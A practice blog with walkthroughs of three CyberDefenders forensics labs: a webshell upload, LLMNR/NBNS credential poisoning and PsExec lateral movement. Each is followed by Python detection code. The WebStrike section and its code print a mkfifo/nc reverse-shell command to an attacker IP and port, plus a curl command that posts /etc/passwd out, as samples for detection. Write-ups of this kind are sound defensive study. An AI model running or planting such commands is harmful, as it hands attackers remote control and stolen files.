CyberDefenders practice blog

#1 WebStrike (a webshell-driven data leak; tests HTTP knowledge)

Scenario: An anomaly was discovered within our company's intranet as our Development team found an unusual file on one of our web servers. Suspecting potential malicious activity, the network team has prepared a pcap file with critical network traffic for analysis for the security team, and you have been tasked with analyzing the pcap.

In short: the company found an unusual file on one of its servers, suspects it is a webshell, and you need to analyze that webshell.

Question 1:

Understanding the geographical origin of the attack aids in geo-blocking measures and threat intelligence analysis. What city did the attack originate from?

This asks where the attack came from. Start from the webshell itself: first locate it.

We find this.

Now look at the content of the malicious code itself.

It removes /tmp/f, creates a FIFO (named pipe) at /tmp/f, feeds the FIFO's contents into a shell for execution, sends the output to 117.11.88.124, and redirects input from that IP back into the pipe, forming a loop. Commands from that IP go into the pipe, the shell executes them, and the results go back to the IP, giving the IP an interactive session with the server, i.e. remote control. (I don't fully understand the FIFO part.) So this IP is the attacker's IP. Looking it up shows it is a Tianjin address, so the attack came from Tianjin.

Question 2: Knowing the attacker's user-agent assists in creating robust filtering rules. What's the attacker's user agent?

The user-agent can simply be copied out of the request that carried the webshell; easy.

It reflects the operating system and browser the other side claims to be using.

Question 3: We need to identify if there were potential vulnerabilities exploited. What's the name of the malicious web shell uploaded?

What is the webshell called?

Just look at the request body: it is labelled filename=image.jpg.php, and that is the one.

The only thing to watch for is that the question asks about the file that was uploaded successfully; the earlier failed upload of image.php can be ignored.

Question 4: Knowing the directory where files uploaded are stored is important for reinforcing defenses against unauthorized access. Which directory is used by the website to store the uploaded files?

Where are uploaded files stored on the server?

So we just need to find where the webshell lives.

Digging through the HTTP traffic turns up the webshell's location, which is also where uploads are stored. The answer is /review/upload/

Question 5: Identifying the port utilized by the web shell helps improve firewall configurations for blocking unauthorized outbound traffic. What port was used by the malicious web shell?

The port is in the shell command itself: 8080

Question 6: Understanding the value of compromised data assists in prioritizing incident response actions. What file was the attacker trying to exfiltrate?

Which file was leaked? Look through the traffic after the webshell was uploaded, and you find this

curl -X sets the HTTP request method. The attacker used this command to send the passwd file to their own machine, so the stolen file is passwd
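As an added example (not code from the write-up), the following Python turns the indicators from questions 1 to 6 into detection checks: a declared image whose filename ends in .php, PHP code inside an upload body, the mkfifo/nc reverse-shell loop with its callback host and port, and a curl POST of a local file. The request bodies and the shell log are constructed; the upload endpoint is not given on the page, so only the storage directory /review/upload/ is used.

```python
import re

# Added example, not code from the write-up. Request bodies below are
# constructed; the attacker IP, port, file names and upload directory are
# the ones named in the write-up.
FILENAME = re.compile(r'filename="([^"]+)"')
DOUBLE_EXT = re.compile(r'\.(?:jpe?g|png|gif)\.php\d?$', re.I)
# the "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh | nc HOST PORT > /tmp/f" loop
FIFO_SHELL = re.compile(
    r'mkfifo\s+\S+.*?\bnc\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)', re.S)
# "curl -X POST -d @FILE URL" typed into the shell, as in question 6
EXFIL = re.compile(r'curl\s+-X\s+POST\b.*?(?:-d|--data(?:-binary)?)\s+@?(?P<file>/\S+)')

def check_upload(body):
    """Flag a multipart upload that carries a webshell; returns (filename, findings)."""
    m = FILENAME.search(body)
    name = m.group(1) if m else ""
    findings = []
    if DOUBLE_EXT.search(name):
        findings.append("double_extension")       # e.g. image.jpg.php
    if "<?php" in body:
        findings.append("php_in_upload")          # declared an image, contains code
    s = FIFO_SHELL.search(body)
    if s:
        findings.append(f"reverse_shell:{s['host']}:{s['port']}")
    return name, findings

def check_shell_session(text):
    """Files pushed out with curl inside the reverse-shell session."""
    return [m["file"] for m in EXFIL.finditer(text)]

def webshell_url(upload_dir, name):
    """Where the upload became reachable, to correlate later GET hits."""
    return upload_dir.rstrip("/") + "/" + name

# Constructed sample traffic
UPLOAD_OK = ('Content-Disposition: form-data; name="image"; filename="image.jpg.php"\r\n'
             'Content-Type: image/jpeg\r\n\r\n'
             '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1'
             '|nc 117.11.88.124 8080 >/tmp/f"); ?>')
UPLOAD_BENIGN = ('Content-Disposition: form-data; name="image"; filename="photo.jpg"\r\n'
                 'Content-Type: image/jpeg\r\n\r\n\xff\xd8\xff\xe0JFIF')
SHELL_LOG = "$ id\nuid=33(www-data)\n$ curl -X POST -d @/etc/passwd http://117.11.88.124/\n"

if __name__ == "__main__":
    print(check_upload(UPLOAD_OK))
    print(check_upload(UPLOAD_BENIGN))
    print(check_shell_session(SHELL_LOG))
    print(webshell_url("/review/upload/", "image.jpg.php"))
```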

#2 PoisonedCredentials (man-in-the-middle / response spoofing; tests NetBIOS, SMB and LLMNR knowledge)

Summary: LLMNR is an application-layer protocol used when one computer connects to another. When A wants to connect to B but only knows B's hostname, A sends a query out on the local link and waits for any machine that knows the name to respond with an IP address; A then connects to B using that IP.

NetBIOS is an application-layer interface with a role similar to LLMNR, but it is not itself a protocol. Its name service, NetBIOS Name Service, appears in Wireshark as NBNS. When A only knows B's NetBIOS name, A sends out a name query for it (the counterpart of the LLMNR query); B responds with its own IP, and A and B connect.

An LLMNR attack: when A sends its query, attacker C responds from their own machine and hands A an IP address; A then connects to C, and C can act on A.

NetBIOS poisoning works the same way.

SMB is mainly used to transfer files between computers.

On to the questions. Question 1: In the context of the incident described in the scenario, the attacker initiated their actions by taking advantage of benign network traffic from legitimate machines. Can you identify the specific mistyped query made by the machine with the IP address 192.168.232.162?

Roughly: what did the machine 192.168.232.162 query? The query meant here is a NetBIOS query, so filter directly for NBNS traffic from that IP (there is no SMB traffic from it at all), and we find that it queried this

That is, it queried fileshaare

Question 2: We are investigating a network security incident. For a thorough investigation, we need to determine the IP address of the rogue machine. What is the IP address of the machine acting as the rogue entity?

This asks for the rogue machine's IP. From the background we know the attacker carries out LLMNR and NetBIOS poisoning, so it must have forged responses; find the forged responses and we have it. Look at the LLMNR traffic: from the previous question, 192.168.232.162 is an innocent host and 224.0.0.252 is the LLMNR multicast address. 192.168.232.162 asks (query) who knows fileshaare, and 192.168.232.215 answers (query response): "I do! That's me."

Then 192.168.232.176 asks who knows prinetr, and the same 192.168.232.215 replies: "I am prinetr!" But 215 cannot have two names at once, so 215 must be the rogue machine.

Question 3: During our investigation, it's crucial to identify all affected machines. What is the IP address of the second machine that received poisoned responses from the rogue machine?

Who was the second host to receive a poisoned response? Already solved in the previous question: 192.168.232.176

Question 4: We suspect that user accounts may have been compromised. To assess this, we must determine the username associated with the compromised account. What is the username of the account that the attacker compromised?

This time the question is the username of the account that 215 compromised. The account should be an SMB account, so look at SMB traffic. Since 215 did the intruding, the source is 215; filter the SMB traffic and we find this

So the answer is janesmith

Question 5: As part of our investigation, we aim to understand the extent of the attacker's activities. What is the hostname of the machine that the attacker accessed via SMB?

This asks for the hostname of the machine the attacker accessed over SMB. From the previous question we know 176 was compromised. The question is not precise here: the hostname meant is the NetBIOS computer name, the machine's name on the LAN, not a hostname in the general sense. The idea is that since 215 broke into 176, it must have gone through the NBNS interface and needed 176's NetBIOS name to set up the connection, so the packets exchanged between 215 and 176 should contain 176's NetBIOS name. Note that there is no actual query to look for here; rather, use the NBNS fields in the traffic between the two to find 176's NetBIOS computer name. In any case we find this, and the answer is ACCOUNTINGPC
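The reasoning in questions 1 to 3 (a mistyped name, one host answering for several different names, and the hosts that accepted its answers), as an added Python example that is not part of the write-up. The name-resolution records are constructed to mirror the traffic described above; KNOWN_NAMES is an assumed list of real hostnames.

```python
from collections import defaultdict
from difflib import get_close_matches

# Added example, not code from the write-up. The records are constructed;
# IPs and names follow those given in the write-up.
LLMNR_MCAST = "224.0.0.252"                              # LLMNR multicast group
KNOWN_NAMES = {"FILESHARE", "PRINTER", "ACCOUNTINGPC"}   # assumed real hosts

# (protocol, src, dst, kind, name)
RECORDS = [
    ("LLMNR", "192.168.232.162", LLMNR_MCAST, "query", "fileshaare"),
    ("LLMNR", "192.168.232.215", "192.168.232.162", "response", "fileshaare"),
    ("NBNS", "192.168.232.162", "192.168.232.255", "query", "FILESHAARE"),
    ("NBNS", "192.168.232.215", "192.168.232.162", "response", "FILESHAARE"),
    ("LLMNR", "192.168.232.176", LLMNR_MCAST, "query", "prinetr"),
    ("LLMNR", "192.168.232.215", "192.168.232.176", "response", "prinetr"),
    ("LLMNR", "192.168.232.162", LLMNR_MCAST, "query", "accountingpc"),
    ("LLMNR", "192.168.232.176", "192.168.232.162", "response", "accountingpc"),
]

def mistyped_queries(records, known=KNOWN_NAMES):
    """Queried names that are near misses of real hostnames: the bait a poisoner feeds on."""
    out = []
    for _proto, src, _dst, kind, name in records:
        if kind == "query" and name.upper() not in known:
            close = get_close_matches(name.upper(), known, n=1, cutoff=0.8)
            if close:
                out.append((src, name, close[0]))
    return out

def find_poisoners(records):
    """A host answering for two or more different names is claiming to be whatever
    was asked for; return {responder_ip: set_of_names} for such hosts."""
    claimed = defaultdict(set)
    for _proto, src, _dst, kind, name in records:
        if kind == "response":
            claimed[src].add(name.upper())
    return {ip: names for ip, names in claimed.items() if len(names) >= 2}

def victims_of(records, rogue):
    """Hosts that accepted a poisoned answer, in first-seen order."""
    seen = []
    for _proto, src, dst, kind, _name in records:
        if kind == "response" and src == rogue and dst not in seen:
            seen.append(dst)
    return seen
```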

#3 PsExec Hunt

Question 1:
In order to effectively trace the attacker's activities within our network, can you determine the IP address of the machine where the attacker initially gained access?

Which machine did the attacker break into first?

Since this involves a PsExec attack, which runs over SMB, filter directly on smb2. We then see that only 10.0.0.130 shows intrusion activity against 10.0.0.133. So the attacker's first machine was 10.0.0.133? No. This is an internal machine attacking another internal machine, so the attacker must have broken into 10.0.0.130 first. The answer is 10.0.0.130

Question 2: To fully comprehend the extent of the breach, can you determine the machine's hostname to which the attacker first pivoted?

This asks for the name of the machine the attacker first pivoted to, i.e. the NetBIOS computer name of 10.0.0.133. Since it is about the interface, look where the connection is set up, that is, the requests sent by 10.0.0.130. And we find this

The answer is SALES-PC

Question 3:
After identifying the initial entry point, it's crucial to understand how far the attacker has moved laterally within our network. Knowing the username of the account the attacker used for authentication will give us insights into the extent of the breach. What is the username utilized by the attacker for authentication?

Which username did the attacker log in with? The screenshot for question 1 already shows it: ssales

Question 4: After figuring out how the attacker moved within our network, we need to know what they did on the target machine. What's the name of the service executable the attacker set up on the target?

What service did the attacker set up on the target? After breaking in, the attacker first queried network information about 133, then accessed the ADMIN$ network share and installed the PSEXESVC service. So PSEXESVC is the service the attacker set up

Question 5: We need to know how the attacker installed the service on the compromised machine to understand the attacker's lateral movement tactics. This can help identify other affected systems. Which network share was used by PsExec to install the service on the target machine?

Where did the attacker install the service? As noted above, ADMIN$

Question 6:
We must identify the network share used to communicate between the two machines. Which network share did PsExec use for communication?

Which network share did PsExec use for communication? You can see that the attacker created a path named PSEXESVC under the IPC$ share and used it to carry 133's standard input and output (133's hostname is HR-PC)

Question 7:

Now that we have a clearer picture of the attacker's activities on the compromised machine, it's important to identify any further lateral movement. What is the machine's hostname to which the attacker attempted to pivot within our network?

What is the NetBIOS computer name of the machine the attacker tried to pivot to?

From the screenshot, the attacker not only got into 133 but also tried to get into 10.0.0.131. The first few attempts failed until the attacker used the username ./IEUser; find that successful connection, dig through it, and we find this

So 131's NetBIOS name is MARKETING-PC
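The PsExec fingerprint this section walks through (an authenticated SMB session, PSEXESVC.exe written over ADMIN$, stdio pipes over IPC$, failed logons before a working account), as an added Python example that is not from the write-up. The SMB2 records are constructed; DOMAIN, the machine name inside the pipe names and the PID are placeholders, while the IPs, hostnames, user, shares and service name are those the write-up reports.

```python
from collections import defaultdict

# Added example, not code from the write-up. Records are constructed;
# DOMAIN, the pipe's machine component and the PID are placeholders.
# (src, dst, op, detail)
EVENTS = [
    ("10.0.0.130", "10.0.0.133", "session_setup", r"DOMAIN\ssales"),
    ("10.0.0.130", "10.0.0.133", "tree_connect", r"\\SALES-PC\ADMIN$"),
    ("10.0.0.130", "10.0.0.133", "create", "PSEXESVC.exe"),
    ("10.0.0.130", "10.0.0.133", "tree_connect", r"\\SALES-PC\IPC$"),
    ("10.0.0.130", "10.0.0.133", "create", "svcctl"),          # service control pipe
    ("10.0.0.130", "10.0.0.133", "create", "PSEXESVC-HR-PC-1234-stdin"),
    ("10.0.0.130", "10.0.0.133", "create", "PSEXESVC-HR-PC-1234-stdout"),
    ("10.0.0.130", "10.0.0.131", "session_setup", r"DOMAIN\ssales"),
    ("10.0.0.130", "10.0.0.131", "status", "STATUS_LOGON_FAILURE"),
    ("10.0.0.130", "10.0.0.131", "session_setup", r".\IEUser"),
    ("10.0.0.130", "10.0.0.131", "tree_connect", r"\\MARKETING-PC\ADMIN$"),
    ("10.0.0.130", "10.0.0.131", "create", "PSEXESVC.exe"),
]

def psexec_activity(events):
    """Group SMB2 ops per (src, dst) and keep the pairs showing PsExec's fingerprint:
    PSEXESVC.exe written over ADMIN$ (stdio pipes over IPC$ confirm it)."""
    acts = defaultdict(lambda: {"users": [], "host": None, "shares": set(),
                                "service_exe": None, "pipes": [], "logon_failures": 0})
    for src, dst, op, detail in events:
        a = acts[(src, dst)]
        if op == "session_setup":
            a["users"].append(detail)
        elif op == "tree_connect":                  # \\HOST\SHARE
            _, _, host, share = detail.split("\\", 3)
            a["host"] = host                        # target's NetBIOS name
            a["shares"].add(share)
        elif op == "create" and detail.upper() == "PSEXESVC.EXE":
            a["service_exe"] = detail
        elif op == "create" and detail.upper().startswith("PSEXESVC-"):
            a["pipes"].append(detail)               # PSEXESVC-<machine>-<pid>-std*
        elif op == "status" and detail == "STATUS_LOGON_FAILURE":
            a["logon_failures"] += 1
    return {k: v for k, v in acts.items()
            if v["service_exe"] and "ADMIN$" in v["shares"]}

def initial_foothold(events):
    """Hosts that launch PsExec but are never a PsExec target: the entry point."""
    pairs = psexec_activity(events)
    return sorted({s for s, _ in pairs} - {d for _, d in pairs})
```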
